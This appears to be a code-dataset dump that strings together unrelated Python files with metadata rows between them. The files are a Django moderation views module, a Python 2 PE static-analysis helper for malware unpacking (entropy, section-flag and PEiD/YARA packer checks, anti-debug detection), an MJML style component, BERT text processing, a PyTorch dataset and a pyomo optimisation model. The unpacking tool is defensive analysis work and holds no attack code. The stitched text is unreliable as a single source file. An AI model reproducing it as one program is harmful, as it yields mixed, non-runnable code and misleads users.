class ProfileReportList(ReportList):
'''List of profile reports'''
model = ProfileReport
item_type = "Profiles"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
profile = Profile.objects.get(id=id)
return ("profile", profile)
@login_required(login_url="/app/login")
@user_is_moderator
def ban_user(request, report_type, user_id):
'''Ban a user by their id; expects report_type arg for redirect reasons'''
if request.method == "POST":
user = User.objects.get(pk=user_id).delete()
path = None
if report_type == "ND":
path = "reports/noodle"
elif report_type == "RV":
path = "reports/review"
elif report_type == "PF":
path = "reports/profile"
messages.add_message(request, messages.WARNING, "User banned")
return HttpResponseRedirect("/app/mod/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def delete_content(request, report_id):
'''This method deletes offending items that have been reported, or just their content'''
if request.method == "POST":
report = Report.objects.get(pk=report_id)
reporter = report.reporter
creator = None
path = get_return_path(report)
# Deleting object is dependent on type
if report.type == "RV":
report = ReviewReport.objects.get(pk=report_id)
creator = report.review.reviewer
report.review.delete()
elif report.type == "ND":
report = NoodleReport.objects.get(pk=report_id)
creator = report.noodle.editor
report.noodle.delete()
elif report.type == "PF":
# Deleting a profile will break fundamental assumptions, so we instead
# remove all content from it.
report = ProfileReport.objects.get(pk=report_id)
report.profile.name = "AnonymousUser"
report.profile.profile_pic = Profile._meta.get_field('profile_pic').default
report.profile.metadata["Description"] = ""
report.profile.save()
creator = report.profile.user
report.delete()
# If we delete the content, it was reasonable to report it
dispatch_hook(reporter, "good-report")
if creator:
# If the noodle's creator hasn't been banned, penalize them
dispatch_hook(creator, "bad-content")
messages.add_message(request, messages.WARNING, "Content deleted")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def update_report_status(request, report_id, status):
'''Change report status to "open", "resolved", or "spam"'''
if request.method == "POST":
# Validate status is the correct value
if status in dict(Report.STATUS_CHOICES):
report = Report.objects.get(pk=report_id)
report.status = status
report.save()
creator = None
path = get_return_path(report)
# Get the creator of the relevant object/report
if report.type == "RV":
report = ReviewReport.objects.get(pk=report_id)
creator = report.review.reviewer
elif report.type == "ND":
report = NoodleReport.objects.get(pk=report_id)
creator = report.noodle.editor
elif report.type == "PF":
report = ProfileReport.objects.get(pk=report_id)
creator = report.profile.user
# Reward people for good reports
if status == "ED":
if report.reporter:
dispatch_hook(report.reporter, "good-report")
if creator:
dispatch_hook(creator, "bad-content")
messages.add_message(request, messages.SUCCESS, "Report marked as resolved")
# Penalize people for bad reports
if status == "SP":
if report.reporter:
dispatch_hook(report.reporter, "bad-report")
messages.add_message(request, messages.WARNING, "Report marked as spam")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def ignore_report(request, report_id):
'''Ignore (delete) a report'''
if request.method == "POST":
report = Report.objects.get(pk=report_id)
path = get_return_path(report)
if report.reporter:
# We assume a bad report is worth deleting if its creator
# wasn't banned
dispatch_hook(report.reporter, "bad-report")
report.delete()
messages.add_message(request, messages.WARNING, "Report ignored")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
def get_return_path(report):
'''Util method to return a correct redirect path'''
if report.type == "RV":
return "review"
elif report.type == "ND":
return "noodle"
elif report.type == "PF":
return "profile" | 39.171533 | 104 | 0.644461 | 4,914 | 0.45784 | 0 | 0 | 4,848 | 0.451691 | 0 | 0 | 2,895 | 0.269729 |
c7cce7b123c5282102e29d889ac9141ac4ccb76e | 10,135 | py | Python | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| null | null | null | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| 1 | 2017-02-06T11:06:11.000Z | 2017-02-06T11:07:29.000Z | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| null | null | null | #!/usr/bin/python
#
# This tool is an attempt to automate some taks related
# to malware unpacking.
#
# Most (if not all) of the tricks used in this tool
# directly comes from an excellent course given
# by Nicolas Brulez (@nicolasbrulez)
#
# Tool developped by David DURVAUX for Autopsit
# (commercial brand of N-Labs sprl)
#
# TODO
# - everything
# - VirusTotal Support
# - dynamic analysis (GDB? Valgring?)
# - static code analysis with Radare2
# - add argument for PEID
# - save status / restore (config/analysis)
# - extract fucnction without offset for comparison of samples
# - ..
#
#
__author__ = 'David DURVAUX'
__contact__ = '[email protected]'
__version__ = '0.01'
# Imports required by this tool
import os
import sys
import json
import pefile
import peutils
import argparse
from distorm3 import Decode, Decode16Bits, Decode32Bits, Decode64Bits, Decompose, DecomposeGenerator, DF_STOP_ON_FLOW_CONTROL
# Imports part of this tool
import static.vivframework
# --------------------------------------------------------------------------- #
# REPRESENTATION OF THE CONFIGURATION
# --------------------------------------------------------------------------- #
class Configuration:
force = False # force to redo all the analysis
modstatic = None # static analysis module
moddynamic = None # dynamic analysis module
# DB downloaded on
# https://raw.githubusercontent.com/viper-framework/viper/master/data/peid/UserDB.TXT (UPX not detected)
# https://raw.githubusercontent.com/ynadji/peid/master/userdb.txt (problems)
# http://blog.didierstevens.com/programs/yara-rules/
signatures = peutils.SignatureDatabase('./peid/peid-userdb-rules-with-pe-module.yara')
def __init__(self):
return
def save(self, filename="./config.json"):
config = {
"force": self.force,
"modstatic": self.modstatic,
"moddynamic": self.moddynamic
}
try:
# write configuration to file
fd = open(filename, "w")
json.dump(config, fd)
fd.close()
print("Configuration saved to %s" % filename)
except Exception as e:
print("Impossible to save configuration to %s" % filename)
print(e)
return
def load(self, filename="./config.json"):
config = {}
try:
# read configuration from file
fd = open(filename, "r")
config = json.load(fd)
fd.close()
# update internal state
            for key in config:
                self.__dict__[key] = config[key]
except Exception as e:
print("Impossible to load configuration from %s" % filename)
print(e)
return
# --------------------------------------------------------------------------- #
# REPRESENTATION OF THE INFO RETRIEVED
# --------------------------------------------------------------------------- #
class BinaryInformations:
"""
This class will represent and hold all the information
retrieved from the binary
"""
vtinfo = {}
peheader = {}
bininfo = {}
settings = {}
packed_score = 0 # current packed score
packed_test = 0 # number of test done
    breakpoints = [] # breakpoints to set for unpacking
anti_debug = False
def __init__(self):
return
def log(self):
#TODO IMPLEMENT
return
def save(self, filename=sys.stdout):
print ("NOT YET IMPLEMENTED!")
return
# --------------------------------------------------------------------------- #
# STATIC ANALYSIS OF BINARY
# --------------------------------------------------------------------------- #
class StaticAnalysis:
"""
Tools to analyze statically binaries
@TODO: define access to page_size, margin, entropy_threshold and packed_score
"""
# class variable
configuration = None
binary = None
bininfo = None
page_size = 0
margin= 0
entropy_threshold = 0
packed_score = 0
SFLAGS = {
"CODE" : 0x00000020,
"DATA" : 0x00000040,
"EXEC" : 0x20000000,
"READ" : 0x40000000,
"WRIT" : 0x80000000
# other: check https://msdn.microsoft.com/en-us/library/ms809762.aspx
}
def __init__(self, binary, configuration, page_size=0x1000, margin=0.1, entropy_threshold = 7.0, packed_score=0):
"""
binary the path to the binary to analyze
"""
# set parameters
self.binary = binary
self.page_size = page_size
self.margin = margin
self.entropy_threshold = entropy_threshold
self.packed_score = packed_score
# instanciate internal objects
self.pe = pefile.PE(binary)
self.bininfo = BinaryInformations()
# keep track of the current configuration
self.configuration = configuration
# initialize static analysis module (TODO - add support for others)
self.configuration.modstatic = static.vivframework.Vivisect(self.binary, self.bininfo, self.configuration.force)
# update BinaryInformation with current settings:
self.bininfo.settings["peanalysis"] = {
"binary" : self.binary,
"page_size" : self.page_size,
"margin" : self.margin,
"entropy_threshold" : self.entropy_threshold,
"packed_score" : self.packed_score
}
# CHECK BINARY SECTIONS
def analyzeSections(self):
"""
        TODO: multiple output support, number of tests
Need to Add:
- check section names
- check where entry point is located (in the last section)
- first section should be writeable
- last section should be executable
- ...
"""
# check number of sections
if(len(self.pe.sections)) != 3:
print "ABNOMALIE in NUMBER OF SECTIONS (%d)!!" % len(self.pe.sections)
self.bininfo.packed_score += 1
self.bininfo.packed_test += 1
# check section + boundary and see if it matches
for section in self.pe.sections:
[name, vaddr, vsize, rsize, flags] = [section.Name, section.VirtualAddress, section.Misc_VirtualSize, section.SizeOfRawData, section.Characteristics]
# check flags
if( int(flags ^ (self.SFLAGS["EXEC"] | self.SFLAGS["WRIT"])) == 0 ): # check if section is executable + writeable
print "ABNOMALIE SECTION SHOULD NOT BE WRITEABLE AND EXECUTABLE (W^X violation)!!"
self.bininfo.packed_score += 1
# check sections sizes (incl. page alignment)
# the rsize need to be written in a multiple of memory page size (min 1.)
# a margin is added (could be customized)
if (rsize / self.page_size + 1) * self.page_size * (1 + self.margin) < vsize:
print "ABNOMALIES with VIRTUAL SIZE ALLOCATION for SECTION: %s" % name
self.bininfo.packed_score += 1
# check entropy
if(section.get_entropy() >= self.entropy_threshold):
print "ABNORMAL ENTROPY (%s)) for SECTION: %s" % (section.get_entropy(), name)
self.bininfo.packed_score += 1
# update bininfo status
self.bininfo.packed_test += 3 # 3 tests are done for each section
print ("TOTAL PACKED SCORE: %s / %s" % (self.bininfo.packed_score, self.bininfo.packed_test))
return self.bininfo
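    def entrypointSectionCheck(self):
        """
        Hedged sketch of one of the 'Need to Add' checks listed above -- NOT
        part of the original tool: flag binaries whose entry point lives in
        the last section, a common trait of packed samples. Assumes pefile's
        contains_rva() section helper.
        """
        ep = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
        for idx, section in enumerate(self.pe.sections):
            if section.contains_rva(ep):
                # an entry point in the last section is suspicious for packers
                if idx == len(self.pe.sections) - 1:
                    print "SUSPICIOUS: ENTRY POINT IN LAST SECTION (%s)" % section.Name
                    self.bininfo.packed_score += 1
                break
        self.bininfo.packed_test += 1
        return self.bininfo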
def callPEiD(self):
"""
Use set of YARA rules to search for known packers
TODO - add a check on signature presence or download or end
- postpone initialization of signatures DB here!!
"""
matches = self.configuration.signatures.match(self.pe, ep_only = True)
if(matches is not None):
if(len(matches) > 0):
print "PACKER FOUND: %s" % matches[0]
return self.bininfo
def graphSearch(self):
"""
Do a graph search in the code for leaf nodes
"""
self.configuration.modstatic.graphSearch()
def isAntiDebug(self):
if self.configuration.modstatic.isAntiDebug():
print "WARNING: ANTI-DEBUGGING TRICKS FOUND!"
def searchVirtualAlloc(self):
self.configuration.modstatic.searchVirtualAlloc()
def getPerFunctionHash(self):
self.configuration.modstatic.getPerFunctionHash()
def decompile(self):
"""
        ! need to take into account the offset in memory !
-- CODE TO REMOVE -- DEPRECATED --
"""
        fd = open(self.binary, "rb")
        code = fd.read()
        fd.close()
        # -- BEGIN TEST CODE --
        for i in DecomposeGenerator(0x100, code, Decode32Bits, DF_STOP_ON_FLOW_CONTROL):
            #print "0x%08x (%02x) %-20s %s" % (i[0], i[1], i[3], i[2])
            print "0x%08x %s" % (i.address, i)
        # -- END TEST CODE --
return
# --------------------------------------------------------------------------- #
# MAIN SECTION OF CODE
# --------------------------------------------------------------------------- #
def start_analysis(binary, configuration):
sa = StaticAnalysis(binary, configuration)
sa.analyzeSections()
sa.callPEiD()
sa.graphSearch()
sa.isAntiDebug()
sa.searchVirtualAlloc()
sa.getPerFunctionHash() #TEST
#sa.decompile() # TEST
return
def main():
# Argument definition
parser = argparse.ArgumentParser(description='Analyse binaries and try to help with deobfuscation')
parser.add_argument('-b', '--binary', help='Binary to analyze')
parser.add_argument('-f', '--force', help='Force a fresh analysis, no restoration of previous work', action="store_true")
parser.add_argument('-y', '--yara', help='Path to YARA DB to use to scan binary')
parser.add_argument('-viv', '--vivisect', help='Path to vivisect installation')
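    # example invocation (script name is illustrative):
    #   python pe_analysis.py -b sample.exe -y userdb.txt -viv /opt/vivisect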
# create a configuration holder
configuration = Configuration()
# Start the fun part :)
args = parser.parse_args()
# if force flag is defined, change behaviour
if args.force:
configuration.force = True
# set YARA DB signature
if args.yara:
if os.path.isfile(args.yara):
configuration.signatures = args.yara
else:
print "ERROR: %s not found!" % args.yara
exit()
# TEST - save configuration for re-use
#configuration.save()
configuration.load()
# set Vivisect path and Initialize
# currently only vivisect is supported
# this code need to be changed if other libraries get supported later
if args.vivisect:
if os.path.isdir(args.vivisect):
sys.path.append(args.vivisect)
else:
print "ERROR: %s not found!" % args.vivisect
exit()
    # Check that a binary to analyze was provided
binary = None
if args.binary:
if os.path.isfile(args.binary):
binary = args.binary
start_analysis(binary, configuration)
else:
print "You need to specify a file to analyze"
exit()
if __name__ == "__main__":
main()
# --------------------------------------------------------------------------- #
# That's all folks ;)
# --------------------------------------------------------------------------- #
# --------------------------------------------------------------------------- #
# mjml/elements/head/mj_style.py -- ESA-CCI-ODP/mjml-stub (MIT)
# --------------------------------------------------------------------------- #
from ._head_base import HeadComponent
__all__ = ['MjStyle']
class MjStyle(HeadComponent):
@classmethod
def default_attrs(cls):
return {
'inline' : '',
}
def handler(self):
add = self.context['add']
inline_attr = 'inlineStyle' if (self.get_attr('inline') == 'inline') else 'style'
if inline_attr == 'inlineStyle':
raise NotImplementedError('style inlining not supported yet')
add(inline_attr, self.getContent())
# --------------------------------------------------------------------------- #
# model_zoo/official/nlp/bert/src/sample_process.py -- i4oolish/mindspore (Apache-2.0)
# --------------------------------------------------------------------------- #
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""process txt"""
import re
import json
def process_one_example_p(tokenizer, text, max_seq_len=128):
    """process one test line into (input_ids, input_mask, segment_ids), each padded to max_seq_len"""
textlist = list(text)
tokens = []
for _, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
if len(tokens) >= max_seq_len - 1:
tokens = tokens[0:(max_seq_len - 2)]
ntokens = []
segment_ids = []
label_ids = []
ntokens.append("[CLS]")
segment_ids.append(0)
for _, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
ntokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
ntokens.append("**NULL**")
assert len(input_ids) == max_seq_len
assert len(input_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
feature = (input_ids, input_mask, segment_ids)
return feature
def label_generation(text="", probs=None, label2id_file=""):
"""generate label"""
data = [text]
probs = [probs]
result = []
label2id = json.loads(open(label2id_file).read())
id2label = [k for k, v in label2id.items()]
for index, prob in enumerate(probs):
for v in prob[1:len(data[index]) + 1]:
result.append(id2label[int(v)])
labels = {}
start = None
index = 0
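    # illustrative walk-through: for text == "ABC" with decoded tags
    # ["B-LOC", "I-LOC", "O"], the scan below produces
    # {"LOC": {"AB": [[0, 1]]}} -- per-entity [start, end] character offsets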
for _, t in zip("".join(data), result):
if re.search("^[BS]", t):
if start is not None:
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
start = index
if re.search("^O", t):
if start is not None:
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
start = None
index += 1
if start is not None:
label = result[start][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
return labels
# --------------------------------------------------------------------------- #
# lang_model/data_loader.py -- alex44jzy/FancyALMLDLNLP (MIT)
# --------------------------------------------------------------------------- #
import torch
from torch.nn import functional as F
from torch.utils.data import Dataset
from gensim.corpora.dictionary import Dictionary
class LangDataset(Dataset):
def __init__(self, src_sents, trg_sents, max_len=-1):
self.src_sents = src_sents
self.trg_sents = trg_sents
# Create the vocabulary for both the source and target.
self.vocab = Dictionary(src_sents + trg_sents)
# Patch the vocabularies and add the <pad> and <unk> symbols.
special_tokens = {'<pad>': 0, '<unk>': 1, '</s>': 2}
self.vocab.patch_with_special_tokens(special_tokens)
# Keep track of how many data points.
self._len = len(src_sents)
        if max_len < 0:
            # If it's not set, use the longest sentence in the data
            # (both source and target are padded to this length).
            self.max_len = max(len(sent) for sent in src_sents + trg_sents)
        else:
            self.max_len = max_len
def pad_sequence(self, vectorized_sent, max_len):
# To pad the sentence:
# Pad left = 0; Pad right = max_len - len of sent.
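        # e.g. max_len=5 and len(vectorized_sent)=2 -> pad_dim == (0, 3),
        # so tensor([4, 9]) becomes tensor([4, 9, 0, 0, 0]) (0 is the <pad> id)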
pad_dim = (0, max_len - len(vectorized_sent))
return F.pad(vectorized_sent, pad_dim, 'constant')
def __getitem__(self, index):
vectorized_src = self.vectorize(self.vocab, self.src_sents[index])
vectorized_trg = self.vectorize(self.vocab, self.trg_sents[index])
return {'x': self.pad_sequence(vectorized_src, self.max_len),
'y': self.pad_sequence(vectorized_trg, self.max_len),
'x_len': len(vectorized_src),
'y_len': len(vectorized_trg)}
def __len__(self):
return self._len
def vectorize(self, vocab, tokens):
"""
:param tokens: Tokens that should be vectorized.
:type tokens: list(str)
"""
# See https://radimrehurek.com/gensim/corpora/dictionary.html#gensim.corpora.dictionary.Dictionary.doc2idx
# Lets just cast list of indices into torch tensors directly =)
return torch.tensor(vocab.doc2idx(tokens, unknown_word_index=1))
def unvectorize(self, vocab, indices):
"""
        :param indices: Indices that should be converted back to tokens.
        :type indices: list(int)
"""
return [vocab[i] for i in indices]
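# minimal usage sketch (hypothetical src_sents/trg_sents are lists of token lists):
#   dataset = LangDataset(src_sents, trg_sents)
#   loader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True)
#   batch = next(iter(loader))  # batch['x'] and batch['y']: (32, dataset.max_len)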
# --------------------------------------------------------------------------- #
# models_nonconvex_simple2/ndcc13persp.py -- grossmann-group/pyomo-MINLP-benchmarking (MIT)
# --------------------------------------------------------------------------- #
# MINLP written by GAMS Convert at 08/20/20 01:30:45
#
# Equation counts
#     Total        E        G        L        N        X        C        B
#       297      170       42       85        0        0        0        0
#
# Variable counts
#                  x        b        i      s1s      s2s       sc       si
#     Total     cont   binary  integer     sos1     sos2    scont     sint
#       673      631       42        0        0        0        0        0
# FX        0        0        0        0        0        0        0        0
#
# Nonzero counts
#     Total    const       NL      DLL
#      2479     2353      126        0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,None),initialize=0)
